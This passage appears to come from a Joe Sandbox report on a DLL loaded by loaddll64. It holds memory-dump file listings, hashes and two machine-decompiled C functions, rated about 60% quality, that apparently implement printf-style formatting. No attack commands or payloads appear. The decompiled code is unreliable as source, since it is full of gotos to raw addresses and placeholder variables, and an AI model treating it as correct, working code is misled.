                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b9ef2e2fb4b5329e75682cb22a7e02ab59d0d9f5e99b726f6190079aa1a73f9f
                                                                      • Instruction ID: fed3fc60cb786a46d20a7aa39acdeabb0ecaf67690b0b66671004dd5be242551
                                                                      • Opcode Fuzzy Hash: b9ef2e2fb4b5329e75682cb22a7e02ab59d0d9f5e99b726f6190079aa1a73f9f
                                                                      • Instruction Fuzzy Hash: 6AD1AF76654A9982EBAB8F1980407AD37A0F70ABC8F54D216FE4D473D4EF35CA5AC340
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 60%
                                                                      			E0000000118002DB50(long long __rbx, long long __rcx, void* __rdx, long long __rsi, long long __rbp, void* __r8, void* __r10, long long _a16, long long _a24, long long _a32) {
                                                                      				void* _v40;
                                                                      				signed int _v56;
                                                                      				short _v64;
                                                                      				short _v68;
                                                                      				signed short _v72;
                                                                      				long long _v88;
                                                                      				void* __rdi;
                                                                      				signed int _t124;
                                                                      				void* _t127;
                                                                      				void* _t159;
                                                                      				void* _t166;
                                                                      				unsigned int _t167;
                                                                      				signed char _t168;
                                                                      				signed int _t179;
                                                                      				signed short _t191;
                                                                      				void* _t194;
                                                                      				void* _t198;
                                                                      				signed long long _t259;
                                                                      				long long _t277;
                                                                      				long long _t279;
                                                                      				long long _t280;
                                                                      				intOrPtr* _t282;
                                                                      				intOrPtr _t286;
                                                                      				intOrPtr* _t288;
                                                                      				void* _t292;
                                                                      				signed long long _t294;
                                                                      				intOrPtr _t297;
                                                                      				intOrPtr _t299;
                                                                      				void* _t301;
                                                                      				signed int* _t302;
                                                                      				long long _t305;
                                                                      				void* _t307;
                                                                      				signed long long _t308;
                                                                      				void* _t310;
                                                                      				intOrPtr _t311;
                                                                      				signed long long _t319;
                                                                      				void* _t320;
                                                                      				intOrPtr* _t322;
                                                                      
                                                                      				_t310 = __r8;
                                                                      				_t305 = __rbp;
                                                                      				_t303 = __rsi;
                                                                      				_t292 = __rdx;
                                                                      				_t279 = __rcx;
                                                                      				_a16 = __rbx;
                                                                      				_a24 = __rbp;
                                                                      				_a32 = __rsi;
                                                                      				_t308 = _t307 - 0x50;
                                                                      				_t259 =  *0x80070098; // 0xd02b0a549a3
                                                                      				_v56 = _t259 ^ _t308;
                                                                      				_t124 =  *(__rcx + 0x3a) & 0x0000ffff;
                                                                      				_t277 = __rcx;
                                                                      				_t6 = _t301 - 0x20; // 0x58
                                                                      				_t191 = _t6;
                                                                      				_t7 = _t301 - 0x77; // 0x1
                                                                      				r12d = _t7;
                                                                      				_t198 = _t124 - 0x64;
                                                                      				if (_t198 > 0) goto 0x8002dc06;
                                                                      				if (_t198 == 0) goto 0x8002dc77;
                                                                      				if (_t124 == 0x41) goto 0x8002dc84;
                                                                      				if (_t124 == 0x43) goto 0x8002dbe3;
                                                                      				if (_t124 - 0x44 <= 0) goto 0x8002dc8f;
                                                                      				if (_t124 - 0x47 <= 0) goto 0x8002dc84;
                                                                      				if (_t124 == 0x53) goto 0x8002dc39;
                                                                      				if (_t124 == _t191) goto 0x8002dbf9;
                                                                      				if (_t124 == 0x5a) goto 0x8002dbef;
                                                                      				if (_t124 == 0x61) goto 0x8002dc84;
                                                                      				if (_t124 != 0x63) goto 0x8002dc8f;
                                                                      				E000000011800317D4(_t124 - 0x63, __rcx, __rcx, __rsi);
                                                                      				goto 0x8002dc89;
                                                                      				E0000000118002F16C(_t166, __rcx, __rcx, _t303);
                                                                      				goto 0x8002dc89;
                                                                      				_t127 = E0000000118001F520(r12b, __rcx, __rcx, _t292, _t303, __rbp, _t310, __r10);
                                                                      				goto 0x8002dc89;
                                                                      				if (_t127 - 0x67 <= 0) goto 0x8002dc84;
                                                                      				if (_t127 == 0x69) goto 0x8002dc77;
                                                                      				if (_t127 == 0x6e) goto 0x8002dc70;
                                                                      				if (_t127 == 0x6f) goto 0x8002dc50;
                                                                      				if (_t127 == 0x70) goto 0x8002dc40;
                                                                      				if (_t127 == 0x73) goto 0x8002dc39;
                                                                      				if (_t127 == 0x75) goto 0x8002dc7b;
                                                                      				if (_t127 != 0x78) goto 0x8002dc8f;
                                                                      				goto 0x8002dbfc;
                                                                      				E00000001180032C38(__rcx, __rcx, _t303);
                                                                      				goto 0x8002dc89;
                                                                      				 *((intOrPtr*)(_t279 + 0x30)) = 0x10;
                                                                      				 *((intOrPtr*)(_t279 + 0x34)) = 0xb;
                                                                      				goto 0x8002dbf9;
                                                                      				_t167 =  *(_t279 + 0x28);
                                                                      				if ((r12b & _t167 >> 0x00000005) == 0) goto 0x8002dc64;
                                                                      				asm("bts ecx, 0x7");
                                                                      				 *(_t277 + 0x28) = _t167;
                                                                      				_t280 = _t277;
                                                                      				E0000000118001C510(0, _t277, _t280, _t292, _t303, _t305, _t310, __r10);
                                                                      				goto 0x8002dc89;
                                                                      				E000000011800321C8(_t277, _t280);
                                                                      				goto 0x8002dc89;
                                                                      				 *(_t280 + 0x28) =  *(_t280 + 0x28) | 0x00000010;
                                                                      				E0000000118001DD18(0, _t277, _t280, _t292, _t303, _t305, _t310, __r10);
                                                                      				goto 0x8002dc89;
                                                                      				if (E00000001180030878(0, 0x78, _t277, _t280, _t305) != 0) goto 0x8002dc96;
                                                                      				goto 0x8002df81;
                                                                      				if ( *((intOrPtr*)(_t277 + 0x38)) != bpl) goto 0x8002df7e;
                                                                      				_t168 =  *(_t277 + 0x28);
                                                                      				_v68 = 0;
                                                                      				_v64 = 0;
                                                                      				r13d = 0x20;
                                                                      				if ((r12b & 0) == 0) goto 0x8002dcf4;
                                                                      				if ((r12b & 0) == 0) goto 0x8002dcd6;
                                                                      				_v68 = _t320 + 0xd;
                                                                      				goto 0x8002dcf1;
                                                                      				if ((r12b & _t168) == 0) goto 0x8002dce2;
                                                                      				goto 0x8002dccf;
                                                                      				if ((r12b & 0) == 0) goto 0x8002dcf4;
                                                                      				_v68 = r13w;
                                                                      				_t294 = _t319;
                                                                      				r8d =  *(_t277 + 0x3a) & 0x0000ffff;
                                                                      				r10d = 0xffdf;
                                                                      				if ((r10w & (r8w & 0xffffffff) - _t191) != 0) goto 0x8002dd19;
                                                                      				r9b = r12b;
                                                                      				if ((r12b & 0) != 0) goto 0x8002dd1c;
                                                                      				r9b = bpl;
                                                                      				r15d = 0x30;
                                                                      				if (r9b != 0) goto 0x8002dd36;
                                                                      				if (0 == 0) goto 0x8002dd55;
                                                                      				 *((intOrPtr*)(_t308 + 0x34 + _t294 * 2)) = r15w;
                                                                      				if (r8w == _t191) goto 0x8002dd49;
                                                                      				if (r8w != 0x41) goto 0x8002dd4c;
                                                                      				 *((short*)(_t308 + 0x36 + _t294 * 2)) = _t191 & 0x0000ffff;
                                                                      				_t194 =  *((intOrPtr*)(_t277 + 0x2c)) -  *(_t277 + 0x48);
                                                                      				if ((_t168 & 0x0000000c) != 0) goto 0x8002ddc2;
                                                                      				r9d = 0;
                                                                      				if (_t194 <= 0) goto 0x8002ddc2;
                                                                      				_t311 =  *((intOrPtr*)(_t277 + 0x460));
                                                                      				if ( *((intOrPtr*)(_t311 + 0x10)) !=  *((intOrPtr*)(_t311 + 8))) goto 0x8002dd8f;
                                                                      				if ( *((intOrPtr*)(_t311 + 0x18)) == bpl) goto 0x8002dd87;
                                                                      				goto 0x8002dd8a;
                                                                      				 *(_t277 + 0x20) =  *(_t277 + 0x20) + 0x00000001 | 0xffffffff;
                                                                      				goto 0x8002ddb5;
                                                                      				 *(_t277 + 0x20) = _t280 + 1;
                                                                      				 *((intOrPtr*)(_t311 + 0x10)) =  *((intOrPtr*)(_t311 + 0x10)) + _t319;
                                                                      				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t277 + 0x460)))))) = r13w;
                                                                      				 *((long long*)( *((intOrPtr*)(_t277 + 0x460)))) =  *((long long*)( *((intOrPtr*)(_t277 + 0x460)))) + 2;
                                                                      				if ( *(_t277 + 0x20) == 0xffffffff) goto 0x8002ddc2;
                                                                      				r9d = r9d + r12d;
                                                                      				if (r9d - _t194 < 0) goto 0x8002dd6c;
                                                                      				_t302 = _t277 + 0x20;
                                                                      				r8d = 0;
                                                                      				_v88 =  *((intOrPtr*)(_t277 + 8));
                                                                      				_t322 = _t277 + 0x460;
                                                                      				_t282 = _t322;
                                                                      				E00000001180036148(_t280 + 1, _t194, _t277, _t282, _t303, _t305, _t302);
                                                                      				if ((r12b & 0) == 0) goto 0x8002de4e;
                                                                      				if ((r12b &  *(_t277 + 0x28) >> 0x00000002) != 0) goto 0x8002de4e;
                                                                      				r8d = 0;
                                                                      				if (_t194 <= 0) goto 0x8002de4e;
                                                                      				_t297 =  *_t322;
                                                                      				if ( *((intOrPtr*)(_t297 + 0x10)) !=  *((intOrPtr*)(_t297 + 8))) goto 0x8002de25;
                                                                      				if ( *((intOrPtr*)(_t297 + 0x18)) == bpl) goto 0x8002de1e;
                                                                      				goto 0x8002de21;
                                                                      				 *_t302 =  *_t302 + 0x00000001 | 0xffffffff;
                                                                      				goto 0x8002de41;
                                                                      				_t77 = _t282 + 1; // 0x1
                                                                      				 *_t302 = _t77;
                                                                      				 *((intOrPtr*)(_t297 + 0x10)) =  *((intOrPtr*)(_t297 + 0x10)) + _t319;
                                                                      				 *((intOrPtr*)( *((intOrPtr*)( *_t322)))) = r15w;
                                                                      				 *((long long*)( *_t322)) =  *((long long*)( *_t322)) + 2;
                                                                      				if ( *_t302 == 0xffffffff) goto 0x8002de4e;
                                                                      				r8d = r8d + r12d;
                                                                      				if (r8d - _t194 < 0) goto 0x8002de07;
                                                                      				if ( *((intOrPtr*)(_t277 + 0x4c)) != bpl) goto 0x8002df30;
                                                                      				if ( *(_t277 + 0x48) <= 0) goto 0x8002df30;
                                                                      				_t321 =  *((intOrPtr*)(_t277 + 8));
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(_t277 + 8)) + 0x28)) != bpl) goto 0x8002de78;
                                                                      				E000000011800338E0( *_t322, _t277,  *((intOrPtr*)(_t277 + 8)), _t297, _t303);
                                                                      				r9d = 0;
                                                                      				if ( *(_t277 + 0x48) == 0) goto 0x8002def5;
                                                                      				_v72 = r9w;
                                                                      				_t159 = E00000001180040E3C( *_t302, 0, _t277,  &_v72,  *((intOrPtr*)(_t277 + 0x40)), _t302, _t303, _t305,  *((intOrPtr*)( *((intOrPtr*)(_t321 + 0x18)) + 8)),  *((intOrPtr*)(_t277 + 8)));
                                                                      				r9d = 0;
                                                                      				if (_t159 <= 0) goto 0x8002df2a;
                                                                      				_t286 =  *_t322;
                                                                      				if ( *((intOrPtr*)(_t286 + 0x10)) !=  *((intOrPtr*)(_t286 + 8))) goto 0x8002ded0;
                                                                      				if ( *((intOrPtr*)(_t286 + 0x18)) == r9b) goto 0x8002deca;
                                                                      				 *(_t277 + 0x20) =  *(_t277 + 0x20) + r12d;
                                                                      				goto 0x8002dee8;
                                                                      				 *(_t277 + 0x20) =  *(_t277 + 0x20) | 0xffffffff;
                                                                      				goto 0x8002dee8;
                                                                      				 *(_t277 + 0x20) =  *(_t277 + 0x20) + r12d;
                                                                      				 *((intOrPtr*)(_t286 + 0x10)) =  *((intOrPtr*)(_t286 + 0x10)) + _t319;
                                                                      				 *((short*)( *((intOrPtr*)( *_t322)))) = _v72 & 0x0000ffff;
                                                                      				 *((long long*)( *_t322)) =  *((long long*)( *_t322)) + 2;
                                                                      				if (0 + r12d !=  *(_t277 + 0x48)) goto 0x8002de83;
                                                                      				r13d = 0x20;
                                                                      				_t179 =  *_t302;
                                                                      				if (_t179 < 0) goto 0x8002df7e;
                                                                      				if ((r12b & 0) == 0) goto 0x8002df7e;
                                                                      				r8d = 0;
                                                                      				if (_t194 <= 0) goto 0x8002df7e;
                                                                      				_t299 =  *_t322;
                                                                      				if ( *((intOrPtr*)(_t299 + 0x10)) !=  *((intOrPtr*)(_t299 + 8))) goto 0x8002df55;
                                                                      				if ( *((intOrPtr*)(_t299 + 0x18)) == bpl) goto 0x8002df4e;
                                                                      				goto 0x8002df51;
                                                                      				 *(_t277 + 0x20) =  *(_t277 + 0x20) | 0xffffffff;
                                                                      				goto 0x8002def3;
                                                                      				r8d =  *(_t277 + 0x48);
                                                                      				_t288 = _t322;
                                                                      				_v88 =  *((intOrPtr*)(_t277 + 8));
                                                                      				E00000001180036148( *(_t277 + 0x28) >> 2, _t194, _t277, _t288, _t303, _t305, _t302);
                                                                      				goto 0x8002defb;
                                                                      				 *_t302 = _t179 + 0x00000001 | 0xffffffff;
                                                                      				goto 0x8002df71;
                                                                      				 *_t302 = _t288 + 1;
                                                                      				 *((intOrPtr*)( *((intOrPtr*)(_t277 + 0x40)) + 0x10)) =  *((intOrPtr*)( *((intOrPtr*)(_t277 + 0x40)) + 0x10)) + _t319;
                                                                      				 *((intOrPtr*)( *((intOrPtr*)( *_t322)))) = r13w;
                                                                      				 *((long long*)( *_t322)) =  *((long long*)( *_t322)) + 2;
                                                                      				if ( *_t302 == 0xffffffff) goto 0x8002df7e;
                                                                      				r8d = r8d + r12d;
                                                                      				if (r8d - _t194 < 0) goto 0x8002df13;
                                                                      				return E000000011800028F0(r12b,  *_t302, _v56 ^ _t308);
                                                                      			}









































                                                                      0x18002db50
                                                                      0x18002db50
                                                                      0x18002db50
                                                                      0x18002db50
                                                                      0x18002db50
                                                                      0x18002db50
                                                                      0x18002db55
                                                                      0x18002db5a
                                                                      0x18002db68
                                                                      0x18002db6c
                                                                      0x18002db76
                                                                      0x18002db7b
                                                                      0x18002db84
                                                                      0x18002db87
                                                                      0x18002db87
                                                                      0x18002db8a
                                                                      0x18002db8a
                                                                      0x18002db8e
                                                                      0x18002db92
                                                                      0x18002db94
                                                                      0x18002db9e
                                                                      0x18002dba8
                                                                      0x18002dbae
                                                                      0x18002dbb8
                                                                      0x18002dbc2
                                                                      0x18002dbc7
                                                                      0x18002dbcd
                                                                      0x18002dbd3
                                                                      0x18002dbdd
                                                                      0x18002dbe5
                                                                      0x18002dbea
                                                                      0x18002dbef
                                                                      0x18002dbf4
                                                                      0x18002dbfc
                                                                      0x18002dc01
                                                                      0x18002dc0a
                                                                      0x18002dc10
                                                                      0x18002dc16
                                                                      0x18002dc1c
                                                                      0x18002dc22
                                                                      0x18002dc28
                                                                      0x18002dc2e
                                                                      0x18002dc33
                                                                      0x18002dc37
                                                                      0x18002dc39
                                                                      0x18002dc3e
                                                                      0x18002dc40
                                                                      0x18002dc47
                                                                      0x18002dc4e
                                                                      0x18002dc50
                                                                      0x18002dc5b
                                                                      0x18002dc5d
                                                                      0x18002dc61
                                                                      0x18002dc66
                                                                      0x18002dc69
                                                                      0x18002dc6e
                                                                      0x18002dc70
                                                                      0x18002dc75
                                                                      0x18002dc77
                                                                      0x18002dc7d
                                                                      0x18002dc82
                                                                      0x18002dc8d
                                                                      0x18002dc91
                                                                      0x18002dc9a
                                                                      0x18002dca0
                                                                      0x18002dca5
                                                                      0x18002dcac
                                                                      0x18002dcb1
                                                                      0x18002dcbf
                                                                      0x18002dcc9
                                                                      0x18002dccf
                                                                      0x18002dcd4
                                                                      0x18002dcd9
                                                                      0x18002dce0
                                                                      0x18002dce9
                                                                      0x18002dceb
                                                                      0x18002dcf1
                                                                      0x18002dcf4
                                                                      0x18002dcf9
                                                                      0x18002dd0a
                                                                      0x18002dd0e
                                                                      0x18002dd17
                                                                      0x18002dd19
                                                                      0x18002dd20
                                                                      0x18002dd30
                                                                      0x18002dd34
                                                                      0x18002dd36
                                                                      0x18002dd40
                                                                      0x18002dd47
                                                                      0x18002dd4c
                                                                      0x18002dd5a
                                                                      0x18002dd60
                                                                      0x18002dd62
                                                                      0x18002dd67
                                                                      0x18002dd6c
                                                                      0x18002dd7b
                                                                      0x18002dd81
                                                                      0x18002dd85
                                                                      0x18002dd8a
                                                                      0x18002dd8d
                                                                      0x18002dd92
                                                                      0x18002dd95
                                                                      0x18002dda3
                                                                      0x18002ddae
                                                                      0x18002ddb8
                                                                      0x18002ddba
                                                                      0x18002ddc0
                                                                      0x18002ddc6
                                                                      0x18002ddca
                                                                      0x18002ddcd
                                                                      0x18002ddd2
                                                                      0x18002dddc
                                                                      0x18002dde4
                                                                      0x18002ddf4
                                                                      0x18002ddfc
                                                                      0x18002ddfe
                                                                      0x18002de03
                                                                      0x18002de07
                                                                      0x18002de12
                                                                      0x18002de18
                                                                      0x18002de1c
                                                                      0x18002de21
                                                                      0x18002de23
                                                                      0x18002de25
                                                                      0x18002de28
                                                                      0x18002de2a
                                                                      0x18002de34
                                                                      0x18002de3b
                                                                      0x18002de44
                                                                      0x18002de46
                                                                      0x18002de4c
                                                                      0x18002de52
                                                                      0x18002de5d
                                                                      0x18002de63
                                                                      0x18002de6b
                                                                      0x18002de70
                                                                      0x18002de7c
                                                                      0x18002de81
                                                                      0x18002de8c
                                                                      0x18002de9d
                                                                      0x18002dea2
                                                                      0x18002deaa
                                                                      0x18002deac
                                                                      0x18002debc
                                                                      0x18002dec2
                                                                      0x18002dec4
                                                                      0x18002dec8
                                                                      0x18002deca
                                                                      0x18002dece
                                                                      0x18002ded0
                                                                      0x18002ded4
                                                                      0x18002dede
                                                                      0x18002dee4
                                                                      0x18002def1
                                                                      0x18002def5
                                                                      0x18002defb
                                                                      0x18002deff
                                                                      0x18002df0a
                                                                      0x18002df0c
                                                                      0x18002df11
                                                                      0x18002df13
                                                                      0x18002df1e
                                                                      0x18002df24
                                                                      0x18002df28
                                                                      0x18002df2a
                                                                      0x18002df2e
                                                                      0x18002df37
                                                                      0x18002df3b
                                                                      0x18002df42
                                                                      0x18002df47
                                                                      0x18002df4c
                                                                      0x18002df51
                                                                      0x18002df53
                                                                      0x18002df58
                                                                      0x18002df5a
                                                                      0x18002df64
                                                                      0x18002df6b
                                                                      0x18002df74
                                                                      0x18002df76
                                                                      0x18002df7c
                                                                      0x18002dfab

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e425278d5d7db52831e5e1bf369300b60ad876c5ace20bcafca7146f821d9be3
                                                                      • Instruction ID: 38b8e14574df11ac2e975eaf1f102ce47b893e5638b07741ea3b384b11214318
                                                                      • Opcode Fuzzy Hash: e425278d5d7db52831e5e1bf369300b60ad876c5ace20bcafca7146f821d9be3
                                                                      • Instruction Fuzzy Hash: 7DD1C97260464D86EBEB9F2980407AD37A0F748BC8F65C217EE4947794DFA5CE8AC344
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 59%
                                                                      			E0000000118002C51C(void* __edi, void* __esi, long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, void* __r8, void* __r10, long long _a16, long long _a24, long long _a32) {
                                                                      				void* _v40;
                                                                      				signed int _v56;
                                                                      				char _v68;
                                                                      				char _v70;
                                                                      				signed int _v72;
                                                                      				long long _v88;
                                                                      				void* __rbp;
                                                                      				intOrPtr _t110;
                                                                      				void* _t113;
                                                                      				void* _t142;
                                                                      				unsigned int _t149;
                                                                      				signed char _t150;
                                                                      				unsigned int _t155;
                                                                      				signed int _t161;
                                                                      				void* _t171;
                                                                      				void* _t175;
                                                                      				void* _t176;
                                                                      				signed long long _t236;
                                                                      				void* _t252;
                                                                      				intOrPtr* _t257;
                                                                      				intOrPtr* _t261;
                                                                      				void* _t266;
                                                                      				intOrPtr _t269;
                                                                      				intOrPtr _t273;
                                                                      				signed int* _t275;
                                                                      				void* _t279;
                                                                      				void* _t280;
                                                                      				void* _t283;
                                                                      				intOrPtr _t284;
                                                                      				void* _t292;
                                                                      				intOrPtr* _t293;
                                                                      
                                                                      				_t283 = __r8;
                                                                      				_t277 = __rsi;
                                                                      				_t274 = __rdi;
                                                                      				_t171 = __edi;
                                                                      				_a16 = __rbx;
                                                                      				_a24 = __rsi;
                                                                      				_a32 = __rdi;
                                                                      				_t279 = _t280;
                                                                      				_t236 =  *0x80070098; // 0xd02b0a549a3
                                                                      				_v56 = _t236 ^ _t280 - 0x00000050;
                                                                      				_t110 =  *((intOrPtr*)(__rcx + 0x39));
                                                                      				_t252 = __rcx;
                                                                      				r13d = 1;
                                                                      				dil = 0x78;
                                                                      				sil = 0x58;
                                                                      				r14b = 0x41;
                                                                      				_t176 = _t110 - 0x64;
                                                                      				if (_t176 > 0) goto 0x8002c5bf;
                                                                      				if (_t176 == 0) goto 0x8002c622;
                                                                      				if (_t110 == r14b) goto 0x8002c62f;
                                                                      				if (_t110 == 0x43) goto 0x8002c5a2;
                                                                      				if (_t110 - 0x44 <= 0) goto 0x8002c638;
                                                                      				if (_t110 - 0x47 <= 0) goto 0x8002c62f;
                                                                      				if (_t110 == 0x53) goto 0x8002c5e4;
                                                                      				if (_t110 == sil) goto 0x8002c5b5;
                                                                      				if (_t110 == 0x5a) goto 0x8002c5ae;
                                                                      				if (_t110 == 0x61) goto 0x8002c62f;
                                                                      				if (_t110 != 0x63) goto 0x8002c638;
                                                                      				E00000001180031384(_t110, _t110 - 0x63, __rcx, __rcx);
                                                                      				goto 0x8002c634;
                                                                      				E0000000118002EEBC(_t110 - 0x63, __rcx);
                                                                      				goto 0x8002c634;
                                                                      				_t113 = E0000000118001EB04(r13b, __esi, __rcx, __rcx, __rdi, __rsi, _t283, __r10);
                                                                      				goto 0x8002c634;
                                                                      				if (_t113 - 0x67 <= 0) goto 0x8002c62f;
                                                                      				if (_t113 == 0x69) goto 0x8002c622;
                                                                      				if (_t113 == 0x6e) goto 0x8002c61b;
                                                                      				if (_t113 == 0x6f) goto 0x8002c5fb;
                                                                      				if (_t113 == 0x70) goto 0x8002c5eb;
                                                                      				if (_t113 == 0x73) goto 0x8002c5e4;
                                                                      				if (_t113 == 0x75) goto 0x8002c626;
                                                                      				if (_t113 != dil) goto 0x8002c638;
                                                                      				goto 0x8002c5b8;
                                                                      				E00000001180032904(_t113 - dil, __rcx, __rcx);
                                                                      				goto 0x8002c634;
                                                                      				 *((intOrPtr*)(__rcx + 0x30)) = 0x10;
                                                                      				 *((intOrPtr*)(__rcx + 0x34)) = 0xb;
                                                                      				goto 0x8002c5b5;
                                                                      				_t149 =  *(__rcx + 0x28);
                                                                      				if ((r13b & _t149 >> 0x00000005) == 0) goto 0x8002c60f;
                                                                      				asm("bts ecx, 0x7");
                                                                      				 *(__rcx + 0x28) = _t149;
                                                                      				E0000000118001BAF4(0, __esi, __rcx, __rcx, _t274, _t277, _t283, __r10);
                                                                      				goto 0x8002c634;
                                                                      				E00000001180031DE4(r13b & _t149 >> 0x00000005, __rcx, _t277, _t279, __r10);
                                                                      				goto 0x8002c634;
                                                                      				 *(__rcx + 0x28) =  *(__rcx + 0x28) | 0x00000010;
                                                                      				E0000000118001D2FC(0, __esi, __rcx, __rcx, _t274, _t277, _t283, __r10);
                                                                      				goto 0x8002c634;
                                                                      				if (E0000000118002FC5C(0, _t171, __rcx, __rcx, _t277, _t279) != 0) goto 0x8002c63f;
                                                                      				goto 0x8002c8d4;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 2) goto 0x8002c655;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x470)) == r13d) goto 0x8002c8d1;
                                                                      				if ( *((char*)(__rcx + 0x38)) != 0) goto 0x8002c8d1;
                                                                      				_t150 =  *(__rcx + 0x28);
                                                                      				_v72 = 0;
                                                                      				_v70 = 0;
                                                                      				if ((r13b & 0) == 0) goto 0x8002c6a2;
                                                                      				if ((r13b & 0) == 0) goto 0x8002c687;
                                                                      				_v72 = 0x2d;
                                                                      				goto 0x8002c69f;
                                                                      				if ((r13b & _t150) == 0) goto 0x8002c692;
                                                                      				_v72 = 0x2b;
                                                                      				goto 0x8002c69f;
                                                                      				if ((r13b & 0) == 0) goto 0x8002c6a2;
                                                                      				_v72 = 0x20;
                                                                      				_t266 = _t292;
                                                                      				r8b =  *((intOrPtr*)(__rcx + 0x39));
                                                                      				if ((r8b - sil & 0x000000df) != 0) goto 0x8002c6bf;
                                                                      				if ((r13b & _t150 >> 0x00000005) == 0) goto 0x8002c6bf;
                                                                      				r9b = r13b;
                                                                      				goto 0x8002c6c2;
                                                                      				r9b = 0;
                                                                      				if (r9b != 0) goto 0x8002c6d6;
                                                                      				if ((r8b - r14b & 0xffffff00 | (r8b - r14b & 0x000000df) == 0x00000000) == 0) goto 0x8002c6f1;
                                                                      				 *((char*)(_t279 + _t266 - 0x20)) = 0x30;
                                                                      				if (r8b == sil) goto 0x8002c6e5;
                                                                      				if (r8b != r14b) goto 0x8002c6e8;
                                                                      				dil = sil;
                                                                      				 *((intOrPtr*)(_t279 + _t266 - 0x1f)) = dil;
                                                                      				_t175 =  *((intOrPtr*)(__rcx + 0x2c)) -  *((intOrPtr*)(__rcx + 0x48));
                                                                      				if ((_t150 & 0x0000000c) != 0) goto 0x8002c75d;
                                                                      				r9d = 0;
                                                                      				if (_t175 <= 0) goto 0x8002c75d;
                                                                      				_t284 =  *((intOrPtr*)(__rcx + 0x460));
                                                                      				if ( *((intOrPtr*)(_t284 + 0x10)) !=  *((intOrPtr*)(_t284 + 8))) goto 0x8002c72c;
                                                                      				if ( *((char*)(_t284 + 0x18)) == 0) goto 0x8002c724;
                                                                      				goto 0x8002c727;
                                                                      				 *(__rcx + 0x20) =  *(__rcx + 0x20) + 0x00000001 | 0xffffffff;
                                                                      				goto 0x8002c750;
                                                                      				 *(__rcx + 0x20) = __rcx + 1;
                                                                      				 *((intOrPtr*)(_t284 + 0x10)) =  *((intOrPtr*)(_t284 + 0x10)) + _t292;
                                                                      				 *((char*)( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x460)))))) = 0x20;
                                                                      				 *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x460)))) =  *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x460)))) + _t292;
                                                                      				if ( *(__rcx + 0x20) == 0xffffffff) goto 0x8002c75d;
                                                                      				r9d = r9d + r13d;
                                                                      				if (r9d - _t175 < 0) goto 0x8002c708;
                                                                      				_t62 = _t252 + 0x20; // 0x98
                                                                      				_t275 = _t62;
                                                                      				r8d = 0;
                                                                      				_v88 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_t64 = _t252 + 0x460; // 0x4d8
                                                                      				_t293 = _t64;
                                                                      				_t257 = _t293;
                                                                      				E000000011800360A4(__rcx + 1, _t171, _t175, __rcx, _t257, _t275, _t277, _t279, _t275);
                                                                      				_t155 =  *(__rcx + 0x28);
                                                                      				if ((r13b & _t155 >> 0x00000003) == 0) goto 0x8002c7e6;
                                                                      				if ((r13b & _t155 >> 0x00000002) != 0) goto 0x8002c7e6;
                                                                      				r8d = 0;
                                                                      				if (_t175 <= 0) goto 0x8002c7e6;
                                                                      				_t269 =  *_t293;
                                                                      				if ( *((intOrPtr*)(_t269 + 0x10)) !=  *((intOrPtr*)(_t269 + 8))) goto 0x8002c7bf;
                                                                      				if ( *((char*)(_t269 + 0x18)) == 0) goto 0x8002c7b8;
                                                                      				goto 0x8002c7bb;
                                                                      				 *_t275 =  *_t275 + 0x00000001 | 0xffffffff;
                                                                      				goto 0x8002c7d9;
                                                                      				 *_t275 = _t257 + 1;
                                                                      				 *((intOrPtr*)(_t269 + 0x10)) =  *((intOrPtr*)(_t269 + 0x10)) + _t292;
                                                                      				 *((char*)( *((intOrPtr*)( *_t293)))) = 0x30;
                                                                      				 *((intOrPtr*)( *_t293)) =  *((intOrPtr*)( *_t293)) + _t292;
                                                                      				if ( *_t275 == 0xffffffff) goto 0x8002c7e6;
                                                                      				r8d = r8d + r13d;
                                                                      				if (r8d - _t175 < 0) goto 0x8002c7a1;
                                                                      				if ( *((char*)(__rcx + 0x4c)) == 0) goto 0x8002c858;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x48)) <= 0) goto 0x8002c858;
                                                                      				r14d = 0;
                                                                      				_t81 =  &_v68; // -27
                                                                      				r9d =  *( *(__rcx + 0x40)) & 0x0000ffff;
                                                                      				_t82 =  &_v72; // -31
                                                                      				_v72 = _v72 & 0x00000000;
                                                                      				r8d = 6;
                                                                      				_v88 =  *((intOrPtr*)(__rcx + 8));
                                                                      				if (E00000001180040970( *((intOrPtr*)(__rcx + 8)), __rcx, _t82, _t81, _t279, _t284) != 0) goto 0x8002c853;
                                                                      				r8d = _v72;
